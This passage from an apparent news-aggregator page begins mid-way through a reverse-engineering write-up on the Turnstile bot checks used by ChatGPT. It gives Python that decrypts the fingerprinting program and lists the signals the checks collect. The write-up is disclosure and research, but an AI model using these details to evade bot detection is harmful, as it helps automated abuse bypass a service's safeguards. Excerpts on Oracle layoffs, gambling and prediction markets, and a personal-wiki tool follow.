import base64, json

raw = base64.b64decode(dx)                  # turnstile.dx from the prepare response
outer = json.loads(bytes(
    raw[i] ^ p_token[i % len(p_token)]      # p_token: the p token, as bytes
    for i in range(len(raw))
))
# → 89 VM instructions

Inside those 89 instructions, there is a 19KB encrypted blob containing the actual fingerprinting program. This inner blob uses a different XOR key that is not the p token.

Initially I assumed this key was derived from performance.now() and was truly ephemeral. Then I looked at the bytecode more carefully and found the key sitting in the instructions:

[41.02, 0.3, 22.58, 12.96, 97.35]

The last argument, 97.35, is the XOR key: a float literal, generated by the server, embedded in the bytecode it sent to the browser. I verified this across 50 requests. Every time, the float from the instruction decrypts the inner blob to valid JSON. 50 out of 50.

The full decryption chain requires nothing beyond the HTTP request and response:

1. Read p from the prepare request
2. Read turnstile.dx from the prepare response
3. XOR(base64decode(dx), p) → outer bytecode
4. Find the 5-arg instruction after the 19KB blob → its last arg is the key
5. XOR(base64decode(blob), str(key)) → inner program (417-580 VM instructions)

The key is in the payload.
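The five steps above can be sketched in a few lines of Python. This is a minimal reconstruction, not Cloudflare’s code: the helper names (xor_decode, decrypt_outer, decrypt_inner) are mine, and the only structural assumption is the one stated above, that the key is the last argument of the 5-argument instruction following the blob.

```python
import base64
import json

def xor_decode(data: bytes, key: bytes) -> bytes:
    # Repeating-key XOR; the same operation encrypts and decrypts.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decrypt_outer(dx_b64: str, p_token: bytes) -> list:
    # Steps 1-3: the outer bytecode is XOR'd with the p token.
    return json.loads(xor_decode(base64.b64decode(dx_b64), p_token))

def decrypt_inner(outer: list, blob_b64: str) -> list:
    # Steps 4-5: the 5-argument instruction carries the inner XOR key
    # as a float literal in its last slot (e.g. 97.35).
    key_instr = next(ins for ins in outer if isinstance(ins, list) and len(ins) == 5)
    key = str(key_instr[-1]).encode()
    return json.loads(xor_decode(base64.b64decode(blob_b64), key))
```

Because XOR is its own inverse, the same xor_decode both produces and reverses each layer, which is why holding the HTTP exchange alone is enough to recover everything.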

Each inner program uses a custom VM with 28 opcodes (ADD, XOR, CALL, BTOA, RESOLVE, BIND_METHOD, JSON_STRINGIFY, etc.) and randomized float register addresses that change per request. I mapped the opcodes from the SDK source (sdk.js, 1,411 lines, deobfuscated).

The program collects 55 properties. No variation across 377 samples. All 55, every time, organized into three layers:

Storage (5): storage, quota, estimate, setItem, usage. Also writes the fingerprint to localStorage under key 6f376b6560133c2c for persistence across page loads.

These are injected server-side by Cloudflare’s edge. They exist only if the request passed through Cloudflare’s network. A bot making direct requests to the origin server or running behind a non-Cloudflare proxy will produce missing or inconsistent values.

This is the part that matters. __reactRouterContext is an internal data structure that React Router v6+ attaches to the DOM. loaderData contains the route loader results. clientBootstrap is specific to ChatGPT’s SSR hydration.

These properties only exist if the ChatGPT React application has fully rendered and hydrated. A headless browser that loads the HTML but doesn’t execute the JavaScript bundle won’t have them. A bot framework that stubs out browser APIs but doesn’t actually run React won’t have them.

This is bot detection at the application layer, not the browser layer.

After collecting all 55 properties, the program hits a 116-byte encrypted blob that decrypts to 4 final instructions:

[96.05, 3.99, 3.99],    // JSON.stringify(fingerprint)
[22.58, 46.15, 57.34],  // store
[33.34, 3.99, 74.43],   // XOR(json, key)
[1.51, 56.88, 3.99]     // RESOLVE → becomes the token

The fingerprint is JSON.stringify’d, XOR’d, and resolved back to the parent. The result is the OpenAI-Sentinel-Turnstile-Token header sent with every conversation request.

Turnstile is one of three challenges. The other two:

Signal Orchestrator (271 instructions): Installs event listeners for keydown, pointermove, click, scroll, paste, and wheel. Monitors 36 window.__oai_so_* properties tracking keystroke timing, mouse velocity, scroll patterns, idle time, and paste events. A behavioral biometric layer running underneath the fingerprint.

Proof of Work (25-field fingerprint + SHA-256 hashcash): Difficulty is uniform random (400K-500K); 72% solve under 5ms. Includes 7 binary detection flags (ai, createPRNG, cache, solana, dump, InstallTrigger, data), all zero across 100% of 100 samples. The PoW adds compute cost but is not the real defense.
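The Proof of Work piece is standard hashcash: brute-force a nonce until a SHA-256 digest clears a difficulty target. The sketch below is generic, not the Sentinel implementation; the challenge string format and the mapping from the 400K-500K difficulty value to a threshold are assumptions for illustration.

```python
import hashlib

def solve_hashcash(challenge: str, difficulty: int) -> int:
    # Assumed mapping: higher difficulty means a smaller target,
    # so on average about `difficulty` hashes are needed.
    target = (1 << 256) // difficulty
    nonce = 0
    while True:
        digest = hashlib.sha256(f"{challenge}:{nonce}".encode()).digest()
        if int.from_bytes(digest, "big") < target:
            return nonce
        nonce += 1
```

At a difficulty around 500,000 this averages roughly half a million SHA-256 calls, which commodity hardware finishes in milliseconds, consistent with the solve times reported above and with the point that the PoW adds compute cost rather than real defense.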

The XOR key for the inner program is a server-generated float embedded in the bytecode. Whoever generated the turnstile.dx knows the key. The privacy boundary between the user and the system operator is a policy decision, not a cryptographic one.

The obfuscation serves real operational purposes: it hides the fingerprint checklist from static analysis, prevents the website operator (OpenAI) from reading raw fingerprint values without reverse-engineering the bytecode, makes each token unique to prevent replay, and allows Cloudflare to change what the program checks without anyone noticing.

But the “encryption” is XOR with a key that’s in the same data stream. It prevents casual inspection. It does not prevent analysis.

No systems were accessed without authorization. No individual user data is disclosed. All traffic was observed from consented participants. The Sentinel SDK was beautified and manually deobfuscated. All decryption was performed offline using Python.

...

Read the original on www.buchodi.com »

8 899 shares, 2 trendiness

Oracle slashes 30,000 jobs with a cold 6 a.m. email

It was not a phone call. It was not a meeting. For thousands of Oracle employees across the globe, Tuesday morning began with a single email landing in their inboxes just after 6 a.m. EST — and by the time they finished reading it, their careers at one of the world’s largest technology companies were over.

Oracle has launched what analysts believe could be the most extensive layoff in the company’s history, with estimates suggesting the cuts will affect between 20,000 and 30,000 employees — roughly 18% of its global workforce of approximately 162,000 people. Workers in the United States, India, and other regions all reported receiving the same termination notice at nearly the same hour, sent under the name “Oracle Leadership.”

There was no heads-up from human resources, no conversation with a direct manager, and no advance notice of any kind. Just an email.

The email that circulated widely after screenshots were posted by affected workers on Reddit’s r/employeesOfOracle community and the professional forum Blind was brief and formulaic. It told employees that following a review of the company’s current business needs, a decision had been made to eliminate their roles as part of a broader organizational change, that the day of the email was their final working day, and that a severance package would be made available after signing termination paperwork through DocuSign.

Employees were also instructed to update their personal email addresses to receive subsequent communications, including separation details and answers to frequently asked questions. For many, access to internal production systems was revoked almost immediately after the message arrived.

Based on accounts shared across both Reddit and Blind, the cuts were widespread and, in some units, severe. Among the teams reported to be most affected:

RHS (Revenue and Health Sciences) — employees described a reduction in force of at least 30%, with 16 or more engineers from individual business units cut in a single action.

SVOS (SaaS and Virtual Operations Services) — similarly reported a 30% or greater reduction, with manager-level roles included in the sweep.

At least one manager was confirmed among those let go, and affected employees in India said the severance structure is expected to follow a standard formula based on years of service, paid out in months. Any unvested restricted stock units, however, were forfeited immediately.

Workers who had vested stock were told they would retain access to those shares through Fidelity. Some employees noted April 3 as their formal last working day, with a one-month garden leave period to follow. Separately, posts on Blind alleged that Oracle had recently installed monitoring software on company-issued Mac laptops capable of logging all device activity, with warnings circulating among affected employees not to copy any files or code before returning their machines.

The layoffs are directly tied to Oracle’s aggressive and debt-heavy expansion into artificial intelligence infrastructure. According to analysis from TD Cowen, the job cuts are expected to free up between $8 billion and $10 billion in cash flow — money the company urgently needs to fund a massive buildout of AI data centers.

The financial picture surrounding that expansion is striking. Oracle has taken on $58 billion in new debt within just two months. Its stock has lost more than half its value since reaching a peak in September 2025. Multiple U.S. banks have reportedly stepped back from financing some of its data center projects. All of this is happening even as the company posted a 95% jump in net income — reaching $6.13 billion — last quarter.

The contrast underscores the scale of the bet Oracle is making: record profits on one side, a mounting debt load and tens of thousands of eliminated jobs on the other. For the workers who woke up Tuesday morning to that 6 a.m. email, the company’s ambitions offered little comfort.

...

Read the original on rollingout.com »

9 859 shares, 27 trendiness

We Haven’t Seen the Worst of What Gambling and Prediction Markets Will Do to America

Here are three stories about the state of gambling in America.

In November 2025, two pitchers for the Cleveland Guardians, Emmanuel Clase and Luis Ortiz, were charged in a conspiracy for “rigging pitches.” Frankly, I had never heard of rigged pitches before, but the federal indictment describes a scheme so simple that it’s a miracle that this sort of thing doesn’t happen all the time. Three years ago, a few corrupt bettors approached the pitchers with a tantalizing deal: (1) We’ll bet that certain pitches will be balls; (2) you throw those pitches into the dirt; (3) we’ll win the bets and give you some money.

The plan worked. Why wouldn’t it? There are hundreds of pitches thrown in a baseball game, and nobody cares about one bad pitch. The bets were so deviously clever because they offered enormous rewards for bettors and only incidental inconvenience for players and viewers. Before their plan was snuffed out, the fraudsters won $450,000 from pitches that not even the most ardent Cleveland baseball fan would ever remember the next day. Nobody watching America’s pastime could have guessed that they were witnessing a six-figure fraud.

On the morning of February 28th, someone logged onto the prediction market website Polymarket and made an unusually large bet. This bet wasn’t placed on a baseball game. It wasn’t placed on any sport. This was a bet that the United States would bomb Iran on a specific day, despite extremely low odds of such a thing happening.

A few hours later, bombs landed in Iran. This one bet was part of a $553,000 payday for a user named “Magamyman.” And it was just one of dozens of suspicious, perfectly-timed wagers, totaling millions of dollars, placed in the hours before a war began.

It is almost impossible to believe that, whoever Magamyman is, he didn’t have inside information from members of the administration. The term “war profiteering” typically refers to arms dealers who get rich from war. But we now live in a world not only where online bettors stand to profit from war, but also where key decision makers in government have the tantalizing option to make hundreds of thousands of dollars by synchronizing military engagements with their gambling positions.

On March 10, several days into the Iran War, the journalist Emanuel Fabian reported that a warhead launched from Iran struck a site outside Jerusalem.

Meanwhile, on Polymarket, users had placed bets on the precise location of missile strikes on March 10. Fabian’s article was therefore poised to determine payouts of $14 million in betting. As The Atlantic’s Charlie Warzel reported, bettors encouraged him to rewrite his story to produce the outcome that they’d bet on. Others threatened to make his life “miserable.”

A clever dystopian novelist might conceive of a future where poorly paid journalists for news wires are offered six-figure deals to report fictions that cash out bets from online prediction markets. But just how fanciful is that scenario when we have good reason to believe that journalists are already being pressured, bullied, and threatened to publish specific stories that align with multi-thousand-dollar bets about the future?

Put it all together: rigged pitches, rigged war bets, and attempts to rig wartime journalism. Without context, each story would sound like a wacky conspiracy theory. But these are not conspiracy theories. These are things that have happened. These are conspiracies—full stop.

“If you’re not paranoid, you’re not paying attention” has historically been one of those bumper stickers you find on the back of a car with so many other bumper stickers that you worry for the sanity of its occupants. But in this weird new reality where every event on the planet has a price, and behind every price is a shadowy counterparty, the jittery gambler’s paranoia—is what I’m watching happening because somebody more powerful than me bet on it?—is starting to seem, eerily, like a kind of perverse common sense.

What’s remarkable is not just the fact that online sportsbooks have taken over sports, or that betting markets have metastasized in politics and culture, but the speed with which both have taken place.

For most of the last century, the major sports leagues were vehemently against gambling, as the Atlantic staff writer McKay Coppins explained in his recent feature. In 1992, NFL commissioner Paul Tagliabue told Congress that “nothing has done more to despoil the games Americans play and watch than widespread gambling on them.” In 2012, NBA commissioner David Stern loudly threatened New Jersey Gov. Chris Christie for signing a bill to legalize sports betting in the Garden State, reportedly screaming, “we’re going to come after you with everything we’ve got.”

So much for that. Following the 2018 Supreme Court decision Murphy v. NCAA, sports gambling was unleashed into the world, and the leagues haven’t looked back. Last year, the NFL saw $30 billion gambled on football games, and the league itself made half a billion dollars in advertising, licensing, and data deals.

Nine years ago, Americans bet less than $5 billion on sports. Last year, that number rose to at least $160 billion. Big numbers mean nothing to me, so let me put that statistic another way: $5 billion is roughly the amount Americans spend annually at coin-operated laundromats, and $160 billion is nearly what Americans spent last year on domestic airline tickets. So, in a decade, the online sports gambling industry will have risen from the level of coin laundromats to rival the entire airline industry.

And now here come the prediction markets, such as Polymarket and Kalshi, whose combined 2025 revenue came in around $50 billion. “These predictive markets are the logical endpoint of the online gambling boom,” Coppins told me on my podcast Plain English. “We have taught the entire American population how to gamble with sports. We’ve made it frictionless and easy and put it on everybody’s phone. Why not extend the logic and culture of gambling to other segments of American life?” He continued:

Why not let people gamble on who’s going to win the Oscar, when Taylor Swift’s wedding will be, how many people will be deported from the United States next year, when the Iranian regime will fall, whether a nuclear weapon will be detonated in the year 2026, or whether there will be a famine in Gaza? These are not things that I’m making up. These are all bets that you can make on these predictive markets.

Indeed, why not let people gamble on whether there will be a famine in Gaza? The market logic is cold and simple: More bets means more information, and more informational volume means more efficiency in the marketplace of all future happenings. But from another perspective—let’s call it baseline morality?—the transformation of a famine into a windfall event for prescient bettors seems so grotesque as to require no elaboration. One imagines a young man sending his 1099 documents to a tax accountant the following spring: “right, so here are my dividends, these are the cap gains, and, oh yeah, here’s my $9,000 payout for totally nailing when all those kids would die.”

It is a comforting myth that dystopias happen when obviously bad ideas go too far. Comforting, because it plays to our naive hope that the world can be divided into static categories of good versus evil and that once we stigmatize all the bad people and ghettoize all the bad ideas, some utopia will spring into view. But I think dystopias more likely happen because seemingly good ideas go too far. “Pleasure is better than pain” is a sensible notion, and a society devoted to its implications created Brave New World. “Order is better than disorder” sounds alright to me, but a society devoted to the most grotesque vision of that principle takes us to 1984. Sports gambling is fun, and prediction markets can forecast future events. But extended without guardrails or limitations, those principles lead to a world where ubiquitous gambling leads to cheating, cheating leads to distrust, and distrust leads ultimately to cynicism or outright disengagement.

“The crisis of authority that has kind of already visited every other American institution in the last couple of decades has arrived at professional sports,” Coppins said. Two-thirds of Americans now believe that professional athletes sometimes change their performance to influence gambling outcomes. “Not to overstate it, but that’s a disaster,” he said. And not just for sports.

There are four reasons to worry about the effect of gambling on sports and culture.

The first is the risk to individual bettors. Every time we create 1,000 new gamblers, we create dozens of new addicts and a handful of new bankruptcies. As I’ve reported, there is evidence that about one in five men under 25 is on the spectrum of having a gambling problem, and calls to the National Problem Gambling Helpline have roughly tripled since sports gambling was broadly legalized in 2018. Research from UCLA and USC found that bankruptcies increased by 10 percent in states that legalized online sports betting between 2018 and 2023. People will sometimes ask me what business I have worrying about online gambling when people should be free to spend their money however they like. My response is that wise rules place guardrails around economic activity with a certain rate of personal harm. For alcohol, we have licensing requirements, minimum drinking ages, boundaries around hours of sale, and rules about public consumption. As alcohol consumption is declining among young people, gambling is surging; Gen Z has replaced one (often fun) vice with a meaningful chance of addiction with another (often fun) vice with a meaningful chance of addiction. But whereas we have centuries of experience curtailing excessive drinking with rules and customs, we are currently in a free-for-all era of gambling.

The second risk is to individual players and practitioners. One reason why sports commissioners might have wanted to keep gambling out of their business is that gambling turns some people into complete psychopaths, and that’s not a very nice experience for folks on the receiving end of gambling-afflicted psychopaths. In his feature, McKay Coppins reports on the experience of Caroline Garcia, a top-ranked tennis player, who said she received torrents of abusive messages from gamblers both for losing games and for winning games. “This has become a very common experience for athletes at the professional level, even at the college level too,” Coppins said. As the experience of journalist Emanuel Fabian shows, gambling can turn ordinary people into mini mob bosses, who go around threatening players and practitioners who they believe are costing them thousands of dollars.

The third risk is to the integrity of sports—or any other institution. At the end of 2025, in addition to its indictment of the Cleveland Guardians pitchers, the FBI announced 30 arrests involving gambling schemes in the NBA. This cavalcade of arrests has dramatically reduced trust in sports. Two-thirds of Americans now believe that professional athletes change their performance to influence gambling outcomes. It does not require extraordinary creativity to imagine how this principle could extend to other domains and institutions. If more people start to believe that things only happen in the world as a direct result of shadowy interests in vast betting markets, it’s going to be a permanent open season for conspiracy theories.

The ultimate risk is almost too dark to contemplate in much detail. As the logic and culture of casinos moves from sports to politics, the scandals that have visited baseball and basketball might soon arrive in politics. Is it really so unbelievable that a politician might tip off a friend, or assuage an enemy, by giving them inside information that would allow them to profit on betting markets? Is it really so incredible to believe that a government official would try to align policy with a betting position that stood to earn them, or an allied group, hundreds of thousands of dollars? That is what a “rigged pitch” in politics would look like. It’s not just wagering on a policy outcome that you suspect will happen. It’s changing policy outcomes based on what can be wagered.

Gambling is flourishing because it meets the needs of our moment: a low-trust world, where lonely young people are seeking high-risk opportunities to launch them into wealth and comfort. In such an environment, financialization might seem to be the last form of civic participation that feels honest to a large portion of the country. Voting is compromised, and polling is manipulated, and news is algorithmically curated. But a bet settles. A game ends. There is comfort in that. In an uncertain and illegible world, it doesn’t get much more certain and legible than this: You won, or you lost.

A 2023 Wall Street Journal poll found that Americans are pulling away from practically every value that once defined national life—patriotism, religion, community, family. Young people care less than their parents about marriage, children, or faith. But nature, abhorring a vacuum, is filling the moral void left by retreating institutions with the market. Money has become our final virtue.

I often find myself thinking about the philosopher Alasdair MacIntyre, who argued in the introduction of After Virtue that modernity had destroyed the shared moral language once supplied by traditions and religion, leaving us with only the language of individual preference. Virtue did not disappear, I think, so much as it died and was reincarnated as the market. It is now the market that tells us what things are worth, what events matter, whose predictions are correct, who is winning, who counts. Money has, in a strange way, become the last moral arbiter standing—the final universal language that a pluralistic, distrustful, post-institutional society can use to communicate with itself.

As this moral vocabulary scales across culture, it also corrodes culture. In sports, when you have money on a game, you’re not rooting for a team. You’re rooting for a proposition. The social function of fandom—shared identity, inherited loyalty, something larger than yourself—dissolves into individual risk. In politics, I fear the consequences will be worse. Prediction markets can be useful for those who want to know the future, but their utility recruits participants into a relationship with the news cycle that is adversarial, and even misanthropic. A young man betting on a terrorist attack or a famine is not acting as a mere concerned citizen whose participation improves the efficiency of global prediction markets. He’s just a dude, on his phone, alone in a room, choosing to root for death.

If that doesn’t bother you, I don’t know how to make it bother you. Based on economic and market efficiency principles alone, this young man’s behavior is defensible. But there is morality outside of markets. There is more to life than the efficiency of information networks. But will we rediscover it any time soon? Don’t bet on it.

...

Read the original on www.derekthompson.org »

10 828 shares, 32 trendiness

Personal Encyclopedias — whoami.wiki

Last year, I visited my grandmother’s house for the first time after the pandemic and came across a cupboard full of loose old photos. I counted 1,351 of them, spanning all the way from my grandparents in their early 20s, my mom as a baby, to me in middle school, just around the time we got our first smartphone and all photos since then were backed up online.

Everything was all over the place, so I spent some time going through them individually and organizing them into groups. Some of the initial groups were based on the physical attributes of the photograph, like similar aspect ratios or film stock. For example, there was a group of black-and-white 32mm square pictures taken around the time my grandfather was in his mid 20s.

As I got done grouping all of them, I was able to see flashes of stories in my head, but they were ephemeral and fragile. For instance, there was a group of photos that looked like it was taken during my grandparents’ wedding, but I didn’t know the order in which they were taken, because EXIF metadata didn’t exist back then.

So I sat down with my grandmother and asked her to reorder the photos and tell me everything she could remember about her wedding. Her face lit up as she narrated the backstory behind the occasion, going from photo to photo, resurfacing details that had been dormant for decades. I wrote everything down and recorded the names of people in some of the photos, some of whom I recognized as younger versions of my uncles and aunts.

After the “interview”, I had multiple pages of notes connecting the photos to events that happened 50 years ago. Since the account was historical, as an inside joke I wanted to see if I could clean it up and present it as a page on Wikipedia so I could print it and give it to her. So I cloned MediaWiki, spun up a local instance, and began my editorial work. I used the 2011 Royal Wedding as a reference and drafted a page starting with the classic infobox and the lead paragraph.

I split the rest of the content into sections and filled them with everything I could verify: dates, names, places, who sat where. I scanned all the photos and spent some time figuring out what to place where, and every photo placement came with the follow-up task of writing a descriptive caption.

Whenever I mentioned a person, I linked them to an empty stub page. After I found out I could also link to the real Wikipedia, I linked out to pages that provided wider context on venues, rituals, and the political climate of the time, such as a legal amendment that was relevant to the wedding ceremony.

In two evenings, I was able to document a full backstory for the photos in a neat article. Those two evenings also made me realize just how powerful encyclopedia software is for recording and preserving media and knowledge that would otherwise have been lost over time.

This was so much fun that I spent the following months writing pages to account for all the photos that needed to be stitched together.

I got help from r/genealogy about how to approach recording oral history and was given resources to better conduct interviews, shoutout to u/stemmatis! I would get on calls with my grandmother and people in the family, ask them a couple of questions, and then write. It was also around this time that I began using audio transcription and language models to make the editorial process easier.

Over time, I managed to write a lot of pages connecting people to different life events. The encyclopedia format made it easy to connect dots I would have never found on my own, like discovering that one of the singers at my grandparents’ wedding was the same nurse who helped deliver me.

After finding all the stories behind the physical photos, I started to work on digital photos and videos that I had stored on Google Photos. The wonderful thing about digital photos is that they come with EXIF metadata that can reveal extra information like date, time, and sometimes geographical coordinates.

This time, without any interviews, I wanted to see if I could use a language model to create a page based on just browsing through the photos. As my first experiment, I created a folder with 625 photos of a family trip to Coorg back in 2012.

I pointed Claude Code at the directory and asked it to draft a wiki page by browsing through the images. I hinted that it could use ImageMagick to create contact sheets, which would help it browse through multiple photos at once.
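A contact sheet is just a grid of thumbnails pasted into a single image. The post used ImageMagick for this (something like `montage *.jpg -tile 5x -geometry 200x200 sheet.jpg`); here is a rough Pillow equivalent as a sketch, with all names my own:

```python
from PIL import Image

def contact_sheet(image_paths, out_path, cols=5, thumb=(200, 200)):
    """Paste thumbnails into one grid image so dozens of photos
    can be reviewed (or shown to a vision model) in a single file."""
    rows = -(-len(image_paths) // cols)  # ceiling division
    sheet = Image.new("RGB", (cols * thumb[0], rows * thumb[1]), "white")
    for i, path in enumerate(image_paths):
        im = Image.open(path)
        im.thumbnail(thumb)  # shrink in place, preserving aspect ratio
        cell = ((i % cols) * thumb[0], (i // cols) * thumb[1])
        sheet.paste(im, cell)
    sheet.save(out_path)
```

Batching photos into sheets like this trades per-image detail for far fewer image reads, which is the point when a model is charged per image it looks at.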

A few minutes and a couple of tokens later, it had created a compelling draft with a detailed account of everything we did during the trip, organized by time of day. The model had no location data to work with, just timestamps and visual content, but it was able to identify the places from the photos alone, including ones I had since forgotten. It picked up details on the modes of transportation we used to get between places just from what it could see.

After I clarified who some of the people in the pictures were, it went on to identify them automatically in the captions. With the detailed outline ready, the page still only contained what the available data could support, so to fill in the gaps I shared a list of anecdotes from my point of view and the model inserted them where the narrative called for them.

The Coorg trip only had photos to work with. My trip to Mexico City in 2022 had a lot more. I had taken 291 photos and 343 videos with an iPhone 12 Pro that included geographical coordinates as part of the EXIF metadata.

On top of that, I exported my location timeline from Google Maps, my Uber trips, my bank transactions, and my Shazam history. I would ask Claude Code to start with the photos and then gradually give it access to the different data exports.

Here are some of the things it did across multiple runs:

It cross-referenced my bank transactions with location data to ascertain which restaurants I went to.

Some of the photos and videos showed me in attendance at a soccer match; however, it was unclear which teams were playing. The model looked up my bank transactions and found a Ticketmaster invoice with information about the teams and the name of the tournament.

It looked up my Uber trips to figure out travel times and exact pickup and drop-off locations.

It used my Shazam tracks to write about the kinds of songs that were playing at a place, like Cuban songs at a Cuban restaurant.

In a follow-up, I mentioned remembering an evening dinner with a guitarist playing in the background. It filtered my media to evening captures, found a frame in a video with the guitarist, uploaded it, and referenced the moment in the page.
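Most of these lookups reduce to matching timestamps across exports. A hypothetical sketch of that core move, matching an event time from one source against a location timeline from another (the data shapes and values here are invented for illustration):

```python
from datetime import datetime, timedelta

def nearest_fix(when, timeline, tolerance=timedelta(minutes=30)):
    """Return the location fix closest in time to `when`, or None if
    nothing in the timeline falls within the tolerance window."""
    best = min(timeline, key=lambda fix: abs(fix["time"] - when))
    return best if abs(best["time"] - when) <= tolerance else None

# Invented data shaped loosely like a location-history export
timeline = [
    {"time": datetime(2022, 5, 3, 13, 5), "lat": 19.4326, "lon": -99.1332},
    {"time": datetime(2022, 5, 3, 20, 40), "lat": 19.4128, "lon": -99.1712},
]
# A card charge timestamp from a bank export lines up with the first fix,
# which is what lets a model say *which* restaurant the charge was at.
lunch = nearest_fix(datetime(2022, 5, 3, 13, 12), timeline)
```

The tolerance window matters: too tight and sparse location fixes match nothing, too loose and a charge gets attributed to the wrong stop on a busy day.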

The MediaWiki architecture handled the edits well: for every new data source, the model made amendments the way a real Wikipedia contributor would. I leaned heavily on features that already existed: talk pages to clarify gaps and consolidate research notes, categories to group pages by theme, revision history to track how a page evolved as new data came in. I didn’t have to build any of this; it was all just there.

What started as me helping the model fill in gaps from my memory gradually inverted. The model was now surfacing things I had completely forgotten, cross-referencing details across data sources in ways I never would have done manually.

So I started pointing Claude Code at other data exports. My Facebook, Instagram, and WhatsApp archives held around 100k messages and a couple thousand voice notes exchanged with close friends over a decade.

The model traced the arc of our friendships through the messages, pulled out the life episodes we had talked each other through, and wove them into multiple pages that read like they were written by someone who knew us both. When I shared the pages with my friends, they wanted to read every single one.

This is when I realized I was no longer working on a family history project. What I had been building, page by page, was a personal encyclopedia. A structured, browsable, interconnected account of my life compiled from the data I already had lying around.

I’ve been working on this as whoami.wiki. It uses MediaWiki as its foundation, which turns out to be a great fit because language models already understand Wikipedia conventions deeply from their training data. You bring your data exports, and agents draft the pages for you to review.

A page about your grandmother’s wedding works the same way as a page about a royal wedding. A page about your best friend works the same way as a page about a public figure.

Oh, and it’s genuinely fun! Putting together the encyclopedia felt like the early days of the Facebook timeline: browsing through finished pages, following links between people and events, and stumbling on details I had forgotten.

But more than the technology, it’s the stories that stayed with me. Writing about my grandmother’s life surfaced things I’d never known: her years as a single mother, the decisions she had to make, the resilience it took. She was a stronger woman than I ever realized. Going through my friendships, I found moments of endearment that I had nearly forgotten, the days friends went the extra mile to be good to me. Seeing those moments laid out on a page made me pick up the phone and call a few of them. The encyclopedia didn’t just organize my data, it made me pay closer attention to the people in my life.

Today I’m releasing whoami.wiki as an open source project. The encyclopedia is yours: it runs on your machine, your data stays with you, and any model can read it. The project is early and I’m still figuring a lot of it out, but if this sounds interesting, you can get started here and tell me what you think!

...

Read the original on whoami.wiki »
